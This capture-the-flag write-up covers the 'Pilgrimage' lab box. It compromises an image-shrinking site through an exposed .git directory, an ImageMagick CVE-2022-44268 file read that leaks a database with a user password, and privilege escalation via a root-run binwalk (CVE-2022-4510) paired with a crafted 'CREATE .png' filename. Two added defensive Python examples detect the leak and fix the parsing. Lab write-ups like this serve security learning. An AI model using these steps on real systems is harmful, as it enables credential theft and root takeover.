
Pilgrimage - HTB Writeup

Enumeration

I started this one out with an nmap scan and a little dirbusting with ffuf, but unfortunately didn't find anything out of the ordinary. I checked out the website and found it was just a simple tool to shrink images. Because the site allowed user uploads I tried attacking it by uploading a PHP webshell, but there was a filter. I tried a bunch of different ways to get around it, but to no avail.

I got lost for a while until I decided to try something different and checked whether the website was a git repo. I requested /.git on the server and got a 403, perfect: the directory exists, it just isn't listable. From there I had to figure out how to recover the files. Apparently a tool called gitdump exists for this exact purpose. I used it and was able to recover the source code, which included the ImageMagick binary the website uses to shrink images.

	endit@pop-os ~/tools/gitdump/output master $ ls -la
	total 26972
	drwxrwxr-x 5 endit endit     4096 Jul  3 14:55 .
	drwxrwxr-x 4 endit endit     4096 Jul  3 14:54 ..
	drwxrwxr-x 6 endit endit     4096 Jul  3 14:55 .git
	drwxrwxr-x 6 endit endit     4096 Jul  3 14:55 assets
	-rwxrwxr-x 1 endit endit     5538 Jul  3 14:55 dashboard.php
	-rwxrwxr-x 1 endit endit     9250 Jul  3 14:55 index.php
	-rwxrwxr-x 1 endit endit     6822 Jul  3 14:55 login.php
	-rwxrwxr-x 1 endit endit       98 Jul  3 14:55 logout.php
	-rwxrwxr-x 1 endit endit 27555008 Jul  3 14:55 magick
	-rwxrwxr-x 1 endit endit     6836 Jul  3 14:55 register.php
	drwxrwxr-x 4 endit endit     4096 Jul  3 14:55 vendor

I checked the version of the binary, googled it, and found that it is affected by CVE-2022-44268, an arbitrary file read vulnerability.

	endit@pop-os ~/tools/gitdump/output master $ ./magick -version
	Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org

Looking through the source I discovered that the website uses a SQLite database stored at /var/db/pilgrimage. So I found a PoC for the vulnerability and used it to create a malicious image that reads that DB.

	endit@pop-os ~/Desktop/CVE-2022-44268 master $ cargo run "/var/db/pilgrimage"
	    Finished dev [unoptimized + debuginfo] target(s) in 0.00s
	     Running `target/debug/cve-2022-44268 /var/db/pilgrimage`

I uploaded the malicious image and, lo and behold, the processed image contained the binary data of the DB.

	endit@pop-os ~/Desktop $ identify -verbose 64a463aa01888.png
	Image:
	  Filename: 64a463aa01888.png
	  Format: PNG (Portable Network Graphics)
	  Mime type: image/png
	  -----------------------------------------------------------

	   20480
	53514c69746520666f726d61742033001000010100402020000000c80000000500000000
	000000000000000400000004000000000000000000000001000000000000000000000000
	0000000000000000000000000000000000000000000000c8002e4b910d0ff800040eba00
	0f650fcd0eba0f3800000000000000000000000000000000000000000000000000000000
	000000000000000000000000000000000000000000000000000000000000000000000000
	000000000000000000000000000000000000000000000000000000000000000000000000
	000000000000000000000000000000000000000000000000000000000000000000000000
	-----------------------------------------------------------------------
	363461343565626230616434632e706e670231036909687474703a2f2f70696c6772696d
	6167652e6874622f736872756e6b2f363461343565613536353031312e706e67

	    signature: d02a8da86fec6ef80c209c8437c76cf8fbecb6528cd7ba95ef93eecc52a171c7
	  Artifacts:
	    filename: 64a463aa01888.png
	    verbose: true
	  Tainted: False
	  Filesize: 1954B
	  Number pixels: 10000
	  Pixels per second: 24.6713MB
	  User time: 0.000u
	  Elapsed time: 0:01.000
	  Version: ImageMagick 6.9.11-60 Q16 x86_64 2021-01-25 https://imagemagick.org

I wrote the binary data out to a new file and loaded it into an online SQLite viewer.
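As an added example (not from this writeup), the same check identify -verbose is doing above, written as a small scanner a defender can run over uploaded or processed images: it walks a PNG's tEXt/zTXt chunks, flags any "Raw profile type" chunk (the artifact an ImageMagick CVE-2022-44268 read leaves in the output image), decodes the hex body and labels the recovered bytes by their magic. The sample PNG is constructed inline, and the profile layout (name line, byte count line, 72-character hex lines) is assumed from the output above.

```python
import struct
import zlib

# Magic bytes used to label what a leaked profile contains; extend as needed.
KNOWN_MAGIC = {b"SQLite format 3\x00": "SQLite database", b"\x7fELF": "ELF binary",
               b"-----BEGIN": "PEM key or certificate"}

def iter_chunks(png: bytes):
    """Yield (chunk type, chunk data) for every chunk of a PNG byte string."""
    if png[:8] != b"\x89PNG\r\n\x1a\n":
        raise ValueError("not a PNG file")
    pos = 8
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        yield ctype, png[pos + 8:pos + 8 + length]
        pos += 12 + length  # 4 length + 4 type + data + 4 CRC

def decode_raw_profile(body: bytes) -> bytes:
    """Raw profile body: '\\n<name>\\n<byte count>\\n' followed by lines of hex (as in identify's output)."""
    return bytes.fromhex(b"".join(body.split(b"\n")[3:]).decode("ascii"))

def find_leaked_profiles(png: bytes):
    """Return [(keyword, decoded bytes, label)] for every tEXt/zTXt 'Raw profile type' chunk."""
    hits = []
    for ctype, data in iter_chunks(png):
        if ctype not in (b"tEXt", b"zTXt"):
            continue
        keyword, _, rest = data.partition(b"\x00")
        if not keyword.startswith(b"Raw profile type"):
            continue
        if ctype == b"zTXt":
            rest = zlib.decompress(rest[1:])  # first byte is the compression method
        payload = decode_raw_profile(rest)
        label = next((n for magic, n in KNOWN_MAGIC.items() if payload.startswith(magic)), "unknown")
        hits.append((keyword.decode(), payload, label))
    return hits

def _chunk(ctype: bytes, data: bytes) -> bytes:
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))

def build_sample_png(leaked: bytes) -> bytes:
    """Constructed 1x1 PNG carrying `leaked` in a tEXt raw-profile chunk laid out like the one above."""
    hexbody = leaked.hex().encode()
    lines = b"\n".join(hexbody[i:i + 72] for i in range(0, len(hexbody), 72))
    text = b"Raw profile type generic\x00\ngeneric\n%8d\n" % len(leaked) + lines + b"\n"
    return (b"\x89PNG\r\n\x1a\n" + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
            + _chunk(b"tEXt", text) + _chunk(b"IDAT", zlib.compress(b"\x00\x00")) + _chunk(b"IEND", b""))

if __name__ == "__main__":
    for kw, payload, label in find_leaked_profiles(build_sample_png(b"SQLite format 3\x00" + b"\x00" * 20)):
        print(f"{kw}: {len(payload)} bytes, looks like {label}")
```

A hit on an image that came out of the shrinking service is a strong signal that the service read a local file into it, since a normal resize never produces such a chunk.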

The DB contained two tables, images and users. The users table had an entry for a user called emily along with a password. With this I was able to SSH in as emily and get the flag.

Privilege Escalation

After searching around for a bit I found an interesting process:

	root         733  0.0  0.0   6816  2380 ?        S    Jul04   0:00 /bin/bash /usr/sbin/malwarescan.sh

I checked out the script malwarescan.sh and found this:

	blacklist=("Executable script" "Microsoft executable")
	/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
		filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
		binout="$(/usr/local/bin/binwalk -e "$filename")"
		for banned in "${blacklist[@]}"; do
			if [[ "$binout" == *"$banned"* ]]; then
				/usr/bin/rm "$filename"
				break
			fi
		done
	done

It watches the directory where shrunk images are stored and checks each new file for "malware" using a program called binwalk. The version of binwalk in use happened to be run as root and vulnerable to CVE-2022-4510. The script uses inotifywait, which watches a directory for changes and runs the loop body whenever a file is created. To exploit this I found a tool to generate a malicious image that gives me a shell.

The script in use here is a little strange: the filename is taken from the last line of inotifywait's output by stripping everything up to "CREATE ", and because sed's ".*" is greedy it strips up to the last occurrence on the line. So if a file named "CREATE .png" lands in shrunk/, the script will try to run ".png" through binwalk. I therefore named my malicious image .png and moved it into shrunk/, then created a file named "CREATE .png", and boom, I had a shell.
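To make the parsing bug concrete, here is an added example (mine, not the box's script) that reproduces the script's tail-and-sed filename extraction in Python beside a parser that anchors on the watched directory and the event field instead of on a greedy match over the file name. The inotifywait lines it is fed are constructed; the directory is the one from the script above.

```python
import os
import re
from typing import Optional

WATCH_DIR = "/var/www/pilgrimage.htb/shrunk/"  # the directory malwarescan.sh watches

def filename_as_in_script(inotify_output: str) -> str:
    """Emulate the script's pipeline: tail -n 1 | sed -n -e 's/^.*CREATE //p'.
    sed's '.*' is greedy, so everything up to the LAST 'CREATE ' on the line is discarded."""
    last_line = inotify_output.rstrip("\n").split("\n")[-1]
    return re.sub(r"^.*CREATE ", "", last_line)

def filename_safe(inotify_line: str, watch_dir: str = WATCH_DIR) -> Optional[str]:
    """Parse one default-format inotifywait line ('<watched dir> <EVENT,EVENT> <name>') by
    anchoring on the known watched directory and the event field, never on a regex over
    the file name. Returns the full path for a CREATE of a plain file name, else None."""
    prefix = watch_dir + " "
    if not inotify_line.startswith(prefix):
        return None
    events, sep, name = inotify_line[len(prefix):].rstrip("\n").partition(" ")
    if not sep or "CREATE" not in events.split(","):
        return None
    # Reject anything that is not a single path component inside watch_dir.
    if not name or "/" in name or name in (".", ".."):
        return None
    return os.path.join(watch_dir, name)

if __name__ == "__main__":
    # Constructed inotifywait output for a file literally named "CREATE .png".
    sample = "/var/www/pilgrimage.htb/shrunk/ CREATE CREATE .png"
    print("script would scan:", repr(filename_as_in_script(sample)))  # '.png'
    print("correct target:   ", repr(filename_safe(sample)))
```

In the script itself the same effect is had by giving inotifywait an explicit --format such as '%w%f', so the loop reads a path rather than parsing a line; the deeper fixes are running binwalk's signature scan without the -e extraction flag and not as root.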


This post is licensed under CC BY 4.0 by the author.